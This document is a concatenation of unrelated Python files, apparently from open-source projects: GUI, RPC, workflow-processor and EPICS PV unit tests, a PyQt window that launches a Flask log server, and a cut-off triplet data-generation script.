@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_rpc():
ip_config = open("rpc_ip_config.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('%s 1\n' % ip_addr)
ip_config.close()
ctx = mp.get_context('spawn')
pserver = ctx.Process(target=start_server)
pclient = ctx.Process(target=start_client)
pserver.start()
time.sleep(1)
pclient.start()
pserver.join()
pclient.join()
if __name__ == '__main__':
test_serialize()
test_rpc_msg()
test_rpc()
|
test_gui.py | # This file is part of the Extra-P software (http://www.scalasca.org/software/extra-p)
#
# Copyright (c) 2020, Technical University of Darmstadt, Germany
#
# This software may be modified and distributed under the terms of a BSD-style license.
# See the LICENSE file in the base directory for details.
import sys
import unittest
import warnings
from threading import Thread
from PySide2.QtCore import QRect, QItemSelectionModel
from PySide2.QtWidgets import QApplication, QCheckBox, QPushButton
from extrap.extrap import extrapgui
from extrap.fileio.text_file_reader import read_text_file
from extrap.gui.AdvancedPlotWidget import AdvancedPlotWidget
from extrap.gui.MainWidget import MainWidget, QCoreApplication
try:
APP = QApplication()
APP.setStyle('Fusion')
app_thread = Thread(target=APP.exec_)
except:
app_thread = None
pass
class TestGuiCommon(unittest.TestCase):
def setUp(self) -> None:
global app_thread
if not app_thread:
raise unittest.SkipTest("GUI could not start.")
if not app_thread.is_alive():
app_thread = Thread(target=APP.exec_)
app_thread.start()
self.window = MainWidget()
self.window.hide()
def tearDown(self):
if not app_thread:
raise unittest.SkipTest("GUI could not start.")
self.window.closeEvent = lambda e: e.accept()
self.window.close()
def test_line_graph(self):
data_display = self.window.data_display
self.assertTrue(data_display.ifTabAlreadyOpened("Line graph"))
data_display.display_widget.tabBar().removeTab(0)
self.assertFalse(data_display.ifTabAlreadyOpened("Line graph"))
data_display.reloadTabs([0])
self.assertTrue(data_display.ifTabAlreadyOpened("Line graph"))
class TestGuiExperimentLoaded(TestGuiCommon):
def setUp(self) -> None:
super().setUp()
exp = read_text_file('data/text/one_parameter_6.txt')
self.window.model_experiment(exp)
def test_graph_model_multiple_selected(self):
data_display = self.window.data_display
self.window.selector_widget.tree_view.selectAll()
# check graphs
tabs = [0, 1, 2, 3, 4, 5, 6, 7, 8]
data_display.reloadTabs(tabs)
for i in tabs:
data_display.display_widget.setCurrentIndex(i)
p = data_display.display_widget.currentWidget()
if isinstance(p, AdvancedPlotWidget):
self.assertIsNotNone(p.graphDisplayWindow)
p.drawGraph()
self.assertIsNotNone(p.graphDisplayWindow)
QCoreApplication.processEvents()
def test_graph_model_one_selected(self):
data_display = self.window.data_display
self.window.selector_widget.tree_view.setSelection(QRect(0, 0, 1, 1), QItemSelectionModel.SelectionFlag.Rows)
# check graphs
tabs = [0, 1, 2, 3, 4, 5, 6, 7, 8]
data_display.reloadTabs(tabs)
for i in tabs:
data_display.display_widget.setCurrentIndex(i)
p = data_display.display_widget.currentWidget()
if isinstance(p, AdvancedPlotWidget):
self.assertIsNotNone(p.graphDisplayWindow)
p.drawGraph()
self.assertIsNotNone(p.graphDisplayWindow)
QCoreApplication.processEvents()
def test_graph_no_model_selected(self):
data_display = self.window.data_display
# check graphs
tabs = [0, 1, 2, 3, 4, 5, 6, 7, 8]
data_display.reloadTabs(tabs)
for i in tabs:
data_display.display_widget.setCurrentIndex(i)
p = data_display.display_widget.currentWidget()
if isinstance(p, AdvancedPlotWidget):
self.assertIsNotNone(p.graphDisplayWindow)
p.drawGraph()
self.assertIsNotNone(p.graphDisplayWindow)
QCoreApplication.processEvents()
def test_modeler_options_reset(self):
modeler_widget = self.window.modeler_widget
modeler_widget._options_container.toggle(False)
QCoreApplication.processEvents()
checkbox = None
reset_button = None
for child in modeler_widget._options_container.content().children():
QCoreApplication.processEvents()
if not reset_button and isinstance(child, QPushButton):
reset_button = child
elif not checkbox and isinstance(child, QCheckBox):
checkbox = child
elif reset_button and checkbox:
break
if checkbox:
old_state = checkbox.isChecked()
checkbox.toggle()
QCoreApplication.processEvents()
self.assertNotEqual(old_state, checkbox.isChecked())
reset_button.click()
for child in modeler_widget._options_container.content().children():
QCoreApplication.processEvents()
if isinstance(child, QCheckBox):
checkbox = child
break
self.assertEqual(old_state, checkbox.isChecked())
class TestGuiLoadExperiment(unittest.TestCase):
def test_load_experiment(self):
_old_warnings_handler = warnings.showwarning
_old_exception_handler = sys.excepthook
try:
window, app = extrapgui.main(test=True, args=[])
exp = read_text_file('data/text/one_parameter_1.txt')
self.assertIsNone(window.experiment)
window.model_experiment(exp)
QCoreApplication.processEvents()
self.assertIsNotNone(window.experiment)
window.closeEvent = lambda e: e.accept()
window.close()
finally:
warnings.showwarning = _old_warnings_handler
sys.excepthook = _old_exception_handler
class TestGuiNoExperiment(TestGuiCommon):
def test_generator_button(self):
self.assertFalse(self.window.modeler_widget._model_button.isEnabled())
self.assertTrue(self.window.modeler_widget.model_name_edit)
def test_graph_no_model_selected(self):
data_display = self.window.data_display
# check graphs
tabs = [0, 1, 2, 3, 4, 5, 6, 7, 8]
data_display.reloadTabs(tabs)
for i in tabs:
data_display.display_widget.setCurrentIndex(i)
p = data_display.display_widget.currentWidget()
if isinstance(p, AdvancedPlotWidget):
self.assertIsNone(p.graphDisplayWindow)
QCoreApplication.processEvents()
class TestGuiSelectedThenNoModelSelected(TestGuiExperimentLoaded):
def setUp(self) -> None:
super().setUp()
self.test_graph_model_one_selected()
self.window.selector_widget.getCurrentModel = lambda: None
if __name__ == '__main__':
unittest.main()
|
test_wfp.py | # pylint: disable=protected-access, unused-argument
# pylint: disable=no-value-for-parameter
import os
from unittest import TestCase
# from hypothesis import given, settings, strategies as st
import threading as mt
import time
from radical.entk.appman.wfprocessor import WFprocessor
from radical.entk import states
try:
import mock
except ImportError:
from unittest import mock
# Hypothesis settings
# settings.register_profile("travis", max_examples=100, deadline=None)
# settings.load_profile("travis")
# ------------------------------------------------------------------------------
#
class TestBase(TestCase):
@mock.patch('radical.utils.generate_id', return_value='wfp.0000')
@mock.patch('os.getcwd', return_value='test_folder')
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Profiler')
@mock.patch('radical.utils.Reporter')
def test_wfp_initialization(self, mocked_generate_id, mocked_getcwd,
mocked_Logger, mocked_Profiler, mocked_Reporter):
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
self.assertIsNone(wfp._wfp_process)
self.assertIsNone(wfp._enqueue_thread)
self.assertIsNone(wfp._dequeue_thread)
self.assertIsNone(wfp._enqueue_thread_terminate)
self.assertIsNone(wfp._dequeue_thread_terminate)
self.assertEqual(wfp._rmq_ping_interval, 10)
self.assertEqual(wfp._path, 'test_folder/test_sid')
self.assertEqual(wfp._workflow, 'workflow')
self.assertEqual(wfp._sid, 'test_sid')
self.assertEqual(wfp._pending_queue, 'pending_queue')
self.assertEqual(wfp._completed_queue, 'completed_queue')
self.assertFalse(wfp._resubmit_failed)
self.assertEqual(wfp._rmq_conn_params, 'test_rmq_params')
self.assertEqual(wfp._uid, 'wfp.0000')
os.environ['RMQ_PING_INTERVAL'] = '20'
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=True)
self.assertIsNone(wfp._wfp_process)
self.assertIsNone(wfp._enqueue_thread)
self.assertIsNone(wfp._dequeue_thread)
self.assertEqual(wfp._rmq_ping_interval, 20)
self.assertEqual(wfp._path, 'test_folder/test_sid')
self.assertEqual(wfp._workflow, 'workflow')
self.assertEqual(wfp._sid, 'test_sid')
self.assertEqual(wfp._pending_queue, 'pending_queue')
self.assertEqual(wfp._completed_queue, 'completed_queue')
self.assertTrue(wfp._resubmit_failed)
self.assertEqual(wfp._rmq_conn_params, 'test_rmq_params')
self.assertEqual(wfp._uid, 'wfp.0000')
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
def test_workflow(self, mocked_init, mocked_Logger):
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
wfp._workflow = 'test_workflow'
self.assertEqual(wfp.workflow, 'test_workflow')
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
def test_wfp_workflow_incomplete(self, mocked_init, mocked_Logger):
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
wfp._logger = mocked_Logger
pipe = mock.Mock()
pipe.lock = mt.Lock()
pipe.completed = False
wfp._workflow = set([pipe])
self.assertTrue(wfp.workflow_incomplete())
pipe.completed = True
self.assertFalse(wfp.workflow_incomplete())
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
with self.assertRaises(Exception):
wfp.workflow_incomplete()
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
def test_check_processor(self, mocked_init):
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
wfp._enqueue_thread = None
wfp._dequeue_thread = None
self.assertFalse(wfp.check_processor())
wfp._enqueue_thread = mock.Mock()
wfp._enqueue_thread.is_alive = mock.MagicMock(side_effect=[False, False,
True, True])
wfp._dequeue_thread = mock.Mock()
wfp._dequeue_thread.is_alive = mock.MagicMock(side_effect=[False, True,
False, True])
self.assertFalse(wfp.check_processor())
self.assertFalse(wfp.check_processor())
self.assertFalse(wfp.check_processor())
self.assertTrue(wfp.check_processor())
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Profiler')
@mock.patch('time.sleep', return_value=None)
@mock.patch.object(WFprocessor, '_create_workload',
side_effect=[['task','stages'],[]])
@mock.patch.object(WFprocessor, '_execute_workload', retur_value=True)
def test_enqueue(self, mocked_init, mocked_Logger, mocked_Profiler,
mocked_sleep, mocked_create_workload, mocked_execute_workload):
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
wfp._logger = mocked_Logger
wfp._prof = mocked_Profiler
wfp._uid = 'wfp.0000'
wfp._enqueue_thread_terminate = mock.Mock()
wfp._enqueue_thread_terminate.is_set = mock.MagicMock(side_effect=[False, True])
wfp._enqueue()
with self.assertRaises(Exception):
wfp._enqueue()
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Reporter')
def test_advance(self, mocked_init, mocked_Logger, mocked_Reporter):
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
global_profs = []
def _log(log_entry, uid, state, msg):
nonlocal global_profs
global_profs.append([log_entry, uid, state, msg])
wfp._logger = mocked_Logger
wfp._report = mocked_Reporter
wfp._prof = mock.Mock()
wfp._prof.prof = mock.MagicMock(side_effect=_log)
wfp._uid = 'wfp.0000'
obj = mock.Mock()
obj.parent_stage = {'uid': 'test_stage'}
obj.parent_pipeline = {'uid': 'test_pipe'}
obj.uid = 'test_object'
obj.state = 'test_state'
wfp._advance(obj, 'Task', None)
self.assertEqual(global_profs[0],['advance', 'test_object', None, 'test_stage'])
global_profs = []
wfp._advance(obj, 'Stage', 'new_state')
self.assertEqual(global_profs[0],['advance','test_object', 'new_state', 'test_pipe'])
global_profs = []
wfp._advance(obj, 'Pipe', 'new_state')
self.assertEqual(global_profs[0],['advance','test_object', 'new_state', None])
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch.object(WFprocessor, '_advance', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Reporter')
def test_create_workload(self, mocked_init, mocked_advance, mocked_Logger,
mocked_Reporter):
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
wfp._resubmit_failed = False
pipe = mock.Mock()
pipe.lock = mt.Lock()
pipe.state = states.INITIAL
pipe.completed = False
pipe.current_stage = 1
stage = mock.Mock()
stage.uid = 'stage.0000'
stage.state = states.SCHEDULING
task = mock.Mock()
task.uid = 'task.0000'
task.state = states.INITIAL
stage.tasks = [task]
pipe.stages = [stage]
wfp._workflow = set([pipe])
workload, scheduled_stages = wfp._create_workload()
self.assertEqual(workload, [task])
self.assertEqual(scheduled_stages, [stage])
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('json.dumps', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Reporter')
@mock.patch('pika.BlockingConnection')
def test_execute_workload(self, mocked_init, mocked_dumps,
mocked_Logger, mocked_Reporter,
mocked_BlockingConnection):
global_advs = []
def _advance_side_effect(obj, obj_type, state):
nonlocal global_advs
global_advs.append([obj, obj_type, state])
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
wfp._rmq_conn_params = 'test_rmq_params'
wfp._pending_queue = ['test_queue']
wfp._logger = mocked_Logger
wfp._advance = mock.MagicMock(side_effect=_advance_side_effect)
stage = mock.Mock()
stage.uid = 'stage.0000'
stage.state = states.SCHEDULING
task = mock.Mock()
task.uid = 'task.0000'
task.state = states.INITIAL
workload = [task]
stage.tasks = [task]
scheduled_stages = [stage]
wfp._execute_workload(workload, scheduled_stages)
self.assertEqual(global_advs[0], [task, 'Task', 'SCHEDULED'])
self.assertEqual(global_advs[1], [stage, 'Stage', 'SCHEDULED'])
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
def test_reset_workload(self, mocked_init, mocked_Logger):
global_advs = []
def _advance_side_effect(obj, obj_type, state):
nonlocal global_advs
global_advs.append([obj, obj_type, state])
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
wfp._logger = mocked_Logger
wfp._advance = mock.MagicMock(side_effect=_advance_side_effect)
pipe = mock.Mock()
pipe.lock = mt.Lock()
pipe.state = states.SCHEDULING
pipe.completed = False
pipe.current_stage = 1
stage = mock.Mock()
stage.uid = 'stage.0000'
stage.state = states.SCHEDULED
task = mock.Mock()
task.uid = 'task.0000'
task.state = states.SCHEDULED
stage.tasks = [task]
pipe.stages = [stage]
pipe2 = mock.Mock()
pipe2.lock = mt.Lock()
pipe2.state = states.DONE
pipe2.uid = 'pipe.0001'
pipe2.completed = True
pipe3 = mock.Mock()
pipe3.lock = mt.Lock()
pipe3.state = states.SUSPENDED
pipe3.uid = 'pipe.0002'
pipe3.completed = False
wfp._workflow = set([pipe, pipe2, pipe3])
wfp.reset_workflow()
self.assertEqual(global_advs[0], [task, 'Task', 'DESCRIBED'])
self.assertEqual(global_advs[1], [stage, 'Stage', 'SCHEDULING'])
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Profiler')
def test_execute_post_exec(self, mocked_init,
mocked_Logger, mocked_Profiler):
global_advs = set()
def _advance_side_effect(obj, obj_type, state):
nonlocal global_advs
global_advs.add((obj, obj_type, state))
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
wfp._uid = 'wfp.0000'
wfp._logger = mocked_Logger
wfp._prof = mocked_Profiler
wfp._advance = mock.MagicMock(side_effect=_advance_side_effect)
pipe = mock.Mock()
pipe.lock = mt.Lock()
pipe.state = states.INITIAL
pipe.uid = 'pipe.0000'
pipe.completed = False
pipe._increment_stage = mock.MagicMock(return_value=True)
pipe.current_stage = 1
pipe2 = mock.Mock()
pipe2.lock = mt.Lock()
pipe2.state = states.INITIAL
pipe2.uid = 'pipe.0001'
pipe2.completed = False
pipe2._increment_stage = mock.MagicMock(return_value=True)
pipe2.current_stage = 1
pipe3 = mock.Mock()
pipe3.lock = mt.Lock()
pipe3.state = states.INITIAL
pipe3.uid = 'pipe.0002'
pipe3.completed = True
pipe3._increment_stage = mock.MagicMock(return_value=True)
pipe3.current_stage = 1
wfp._workflow = set([pipe2, pipe3])
stage = mock.Mock()
stage.uid = 'stage.0000'
stage.state = states.SCHEDULING
stage.post_exec = mock.MagicMock(return_value=['pipe.0001', 'pipe.0002'])
wfp._execute_post_exec(pipe, stage)
exp_out = set([(pipe2, 'Pipeline', states.INITIAL),
(pipe3, 'Pipeline', states.DONE)])
self.assertEqual(global_advs, exp_out)
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch.object(WFprocessor, '_advance', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Profiler')
def test_update_dequeued_task(self, mocked_init, mocked_advance, mocked_Logger,
mocked_Profiler):
global_advs = list()
def _advance_side_effect(obj, obj_type, state):
nonlocal global_advs
global_advs.append([obj, obj_type, state])
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
wfp._uid = 'wfp.0000'
wfp._logger = mocked_Logger
wfp._prof = mocked_Profiler
wfp._resubmit_failed = False
wfp._advance = mock.MagicMock(side_effect=_advance_side_effect)
pipe = mock.Mock()
pipe.uid = 'pipe.0000'
pipe.lock = mt.Lock()
pipe.state = states.INITIAL
pipe.completed = False
pipe.current_stage = 1
pipe._increment_stage = mock.MagicMock(return_value=2)
stage = mock.Mock()
stage.uid = 'stage.0000'
stage.state = states.SCHEDULING
stage._check_stage_complete = mock.MagicMock(return_value=True)
stage.post_exec = None
task = mock.Mock()
task.uid = 'task.0000'
task.parent_pipeline = {'uid': 'pipe.0000'}
task.parent_stage = {'uid': 'stage.0000'}
task.state = states.INITIAL
task.exit_code = 0
stage.tasks = [task]
pipe.stages = [stage]
wfp._workflow = set([pipe])
# Test for issue #271
wfp._update_dequeued_task(task)
self.assertEqual(global_advs[0], [task, 'Task', states.DONE])
self.assertEqual(global_advs[1], [stage, 'Stage', states.DONE])
task.state = states.INITIAL
task.exit_code = None
wfp._update_dequeued_task(task)
self.assertEqual(global_advs[2], [task, 'Task', states.INITIAL])
self.assertEqual(global_advs[3], [stage, 'Stage', states.DONE])
task.exit_code = 1
wfp._update_dequeued_task(task)
self.assertEqual(global_advs[4], [task, 'Task', states.FAILED])
self.assertEqual(global_advs[5], [stage, 'Stage', states.DONE])
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Profiler')
def test_start_processor(self, mocked_init, mocked_Logger,
mocked_Profiler):
global_boolean = {}
def _dequeue_side_effect():
nonlocal global_boolean
global_boolean['dequeue'] = True
def _enqueue_side_effect():
nonlocal global_boolean
global_boolean['enqueue'] = True
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
wfp._uid = 'wfp.0000'
wfp._logger = mocked_Logger
wfp._prof = mocked_Profiler
wfp._enqueue_thread = None
wfp._dequeue_thread = None
wfp._enqueue_thread_terminate = None
wfp._dequeue_thread_terminate = None
wfp._dequeue = mock.MagicMock(side_effect=_dequeue_side_effect)
wfp._enqueue = mock.MagicMock(side_effect=_enqueue_side_effect)
wfp.start_processor()
time.sleep(1)
try:
self.assertIsInstance(wfp._enqueue_thread_terminate, mt.Event)
self.assertIsInstance(wfp._dequeue_thread_terminate, mt.Event)
self.assertIsInstance(wfp._dequeue_thread, mt.Thread)
self.assertIsInstance(wfp._enqueue_thread, mt.Thread)
self.assertTrue(global_boolean['dequeue'])
self.assertTrue(global_boolean['enqueue'])
finally:
if wfp._dequeue_thread.is_alive():
wfp._dequeue_thread.join()
if wfp._enqueue_thread.is_alive():
wfp._enqueue_thread.join()
# ------------------------------------------------------------------------------
#
@mock.patch.object(WFprocessor, '__init__', return_value=None)
@mock.patch('radical.utils.Logger')
@mock.patch('radical.utils.Profiler')
def test_terminate_processor(self, mocked_init, mocked_Logger,
mocked_Profiler):
global_boolean = {}
def _dequeue_side_effect():
nonlocal global_boolean
time.sleep(0.1)
global_boolean['dequeue'] = True
def _enqueue_side_effect():
nonlocal global_boolean
time.sleep(0.1)
global_boolean['enqueue'] = True
wfp = WFprocessor(sid='test_sid', workflow='workflow',
pending_queue='pending_queue',
completed_queue='completed_queue',
rmq_conn_params='test_rmq_params',
resubmit_failed=False)
wfp._uid = 'wfp.0000'
wfp._logger = mocked_Logger
wfp._prof = mocked_Profiler
wfp._enqueue_thread = mt.Thread(target=_enqueue_side_effect)
wfp._dequeue_thread = mt.Thread(target=_dequeue_side_effect)
wfp._enqueue_thread_terminate = mt.Event()
wfp._dequeue_thread_terminate = mt.Event()
wfp._enqueue_thread.start()
wfp._dequeue_thread.start()
wfp.terminate_processor()
self.assertTrue(wfp._enqueue_thread_terminate.is_set())
self.assertTrue(wfp._dequeue_thread_terminate.is_set())
self.assertIsNone(wfp._dequeue_thread)
self.assertIsNone(wfp._enqueue_thread)
self.assertTrue(global_boolean['dequeue'])
self.assertTrue(global_boolean['enqueue'])
|
test_psp.py | import sys
import time
import threading
import logging
import pytest
import numpy as np
import psp
from conftest import test_pvs, pvbase
if sys.version_info.major >= 3:
long = int
logger = logging.getLogger(__name__)
def setup_pv(pvname, connect=True):
pv = psp.PV(pvname)
if connect:
pv.connect(timeout=1.0)
return pv
def test_server_start(server):
pass
@pytest.mark.timeout(10)
@pytest.mark.parametrize('pvname', test_pvs)
def test_connect_and_disconnect(pvname):
logger.debug('test_create_and_clear_channel %s', pvname)
pv = setup_pv(pvname)
assert pv.isconnected
pv.disconnect()
@pytest.mark.timeout(10)
@pytest.mark.parametrize('pvname', test_pvs)
def test_get(pvname):
logger.debug('test_get_data %s', pvname)
pv = setup_pv(pvname)
value = pv.get()
assert value is not None
@pytest.mark.timeout(10)
@pytest.mark.parametrize('pvname', test_pvs)
def test_put_get(pvname):
logger.debug('test_put_get %s', pvname)
pv = setup_pv(pvname)
old_value = pv.get()
pv_type = type(old_value)
logger.debug('%s is of type %s', pvname, pv_type)
if pv_type in (int, long, float):
new_value = old_value + 1
elif pv_type == str:
new_value = "putget"
elif pv_type == tuple:
new_value = tuple([1] * len(old_value))
logger.debug('caput %s %s', pvname, new_value)
pv.put(new_value, timeout=1.0)
assert pv.get() == new_value
@pytest.mark.timeout(10)
@pytest.mark.parametrize('pvname', test_pvs)
def test_monitor(pvname):
logger.debug('test_subscribe %s', pvname)
pv = setup_pv(pvname)
old_value = pv.get()
pv_type = type(old_value)
pv.monitor()
logger.debug('%s is of type %s', pvname, pv_type)
if pv_type in (int, long, float):
new_value = old_value + 1
elif pv_type == str:
new_value = "putmon"
elif pv_type == tuple:
new_value = tuple([1] * len(old_value))
logger.debug('caput %s %s', pvname, new_value)
pv.put(new_value)
n = 0
while n < 10 and pv.value != new_value:
time.sleep(0.1)
n += 1
assert pv.value == new_value
@pytest.mark.timeout(10)
@pytest.mark.parametrize('pvname', test_pvs)
def test_misc(pvname):
logger.debug('test_misc %s', pvname)
pv = setup_pv(pvname)
assert isinstance(pv.host(), str)
assert isinstance(pv.state(), int)
assert isinstance(pv.count, int)
assert isinstance(pv.type(), str)
assert isinstance(pv.rwaccess(), int)
@pytest.mark.timeout(10)
def test_waveform():
logger.debug('test_waveform')
pv = setup_pv(pvbase + ":WAVE")
# Do as a tuple
pv.use_numpy = False
val = pv.get()
assert isinstance(val, tuple)
assert len(val) == pv.count
# Do as a np.ndarray
pv.use_numpy = True
val = pv.get()
assert isinstance(val, np.ndarray)
assert len(val) == pv.count
@pytest.mark.timeout(10)
def test_threads():
logger.debug('test_threads')
def some_thread_thing(pvname):
psp.utils.ensure_context()
pv = setup_pv(pvname)
val = pv.get()
assert isinstance(val, tuple)
pvname = pvbase + ":WAVE"
thread = threading.Thread(target=some_thread_thing, args=(pvname,))
thread.start()
thread.join()
|
main_window.py | # -*- coding: utf-8 -*-
from PyQt5.QtWidgets import QMainWindow
from PyQt5 import QtWidgets, QtCore
from qt_figure import QtFigure
from http_server import flask
import socket
import multiprocessing
import threading
import re
class MyPushButton(QtWidgets.QPushButton):
is_clicked = False
class MyMainWindow(QMainWindow):
ui_signal = QtCore.pyqtSignal(str)
def __init__(self):
super().__init__()
self.title = "Log Analyzer"
self.top = 0
self.left = 0
self.width = 600
self.height = 400
self.push_btn = None
self.ip_line_edit = None
self.port_label_edit = None
self.status_bar = None
self.msg_queue = multiprocessing.Queue(10)
self.process = None
self.read_queue_is_runing = False
def init_window(self):
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
self.setMinimumSize(self.width, self.height)
centralist = QtWidgets.QWidget()
self.setCentralWidget(centralist)
grid_layout = QtWidgets.QGridLayout(centralist) # 继承容器groupBox
figure = QtFigure(width=3, height=2, dpi=100)
figure.plot()
grid_layout.addWidget(figure)
horizontally_widget = QtWidgets.QWidget(centralist)
horizontally_widget.setGeometry(QtCore.QRect(90, 10, 431, 41))
horizontal_layout = QtWidgets.QHBoxLayout(horizontally_widget)
horizontal_layout.setContentsMargins(0, 0, 0, 0)
ip_label = QtWidgets.QLabel(horizontally_widget)
ip_label.setText("ip")
horizontal_layout.addWidget(ip_label)
self.ip_line_edit = QtWidgets.QLineEdit()
self.ip_line_edit.setPlaceholderText("ip")
horizontal_layout.addWidget(self.ip_line_edit, stretch=7)
port_label = QtWidgets.QLabel(horizontally_widget)
port_label.setText("port")
horizontal_layout.addWidget(port_label)
self.port_label_edit = QtWidgets.QLineEdit(horizontally_widget)
self.port_label_edit.setEnabled(True)
horizontal_layout.addWidget(self.port_label_edit, stretch=2)
spacer_item = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
horizontal_layout.addItem(spacer_item)
self.push_btn = MyPushButton(horizontally_widget)
self.push_btn.clicked.connect(lambda: self._on_btn_click(self.push_btn))
horizontal_layout.addWidget(self.push_btn)
menu_bar = QtWidgets.QMenuBar(self)
self.setMenuBar(menu_bar)
self.status_bar = QtWidgets.QStatusBar(self)
self.setStatusBar(self.status_bar)
self.ui_signal.connect(self._show_message)
self._default_config()
def _default_config(self):
self.push_btn.setText("startServer")
addr = MyMainWindow.get_host_ip()
self.ip_line_edit.setText(addr)
self.port_label_edit.setText("5000")
def _on_btn_click(self, sender):
if sender.is_clicked:
self.process.terminate()
self.read_queue_is_runing = False
self.msg_queue.put("quit queue.")
sender.setText("startServer")
else:
ip = self.ip_line_edit.text()
if not self.check_ip(ip):
self.ui_signal.emit("ip is not match.")
return
port = self.port_label_edit.text()
if not port.isnumeric():
return
self.read_queue_is_runing = True
thread = threading.Thread(target=self._read_queue)
thread.start()
self.process = multiprocessing.Process(target=self._worker, args=(self.msg_queue, ip, port))
self.process.start()
sender.setText("closeServer")
sender.is_clicked = not sender.is_clicked
def _show_message(self, msg):
self.status_bar.showMessage(msg)
def _read_queue(self):
while True:
if self.read_queue_is_runing:
data = self.msg_queue.get(block=True)
print(data)
self.ui_signal.emit(data)
else:
break
def _worker(self, q, host, port):
flask.msg_queue = q
# ssl_context = ("cert/cert.pem", "cert/key.pem")
flask.run(host=host, port=int(port), debug=False, threaded=True)
@staticmethod
def check_ip(ip):
compile_ip = re.compile(
"^(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)$")
if compile_ip.match(ip):
return True
else:
return False
@staticmethod
def get_host_ip():
s = None
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
finally:
s.close()
if ip is None:
ip = "127.0.0.1"
return ip
|
generate.py | """Collection of functions to generate data"""
import multiprocessing
import os
from glob import glob
import numpy as np
from torchvision.utils import save_image
from tqdm import tqdm
from src.data.raw import Raw
from src.features import transform
from src.utils import path
def _triplets(dataset: Raw, n_triplets: int, process_id: int):
# Set a different random state for each process.
random_state = np.random.RandomState(seed=None)
classes = list(set([annotation["class_id"] for image, annotation in dataset]))
triplet_list = []
progress_bar = tqdm(range(int(n_triplets)))
for _ in progress_bar:
pos_class = neg_class = None
pos_images = None
positive = negative = None
while pos_class is None or len(pos_images) < 2 or isinstance(pos_images, str):
pos_class = random_state.choice(classes)
pos_images = dataset.get_images(class_id=pos_class)
while neg_class is None or neg_class == pos_class:
neg_class = random_state.choice(classes)
anchor = random_state.choice(pos_images)
while positive is None or anchor == positive:
positive = random_state.choice(pos_images)
while negative is None or negative in pos_images:
negative = dataset.get_images(n_random=1)
aligned_images = transform.align_images(anchor, positive, negative)
if len(aligned_images) == 3:
image_paths = [
path.change_data_category(image_path, "processed")
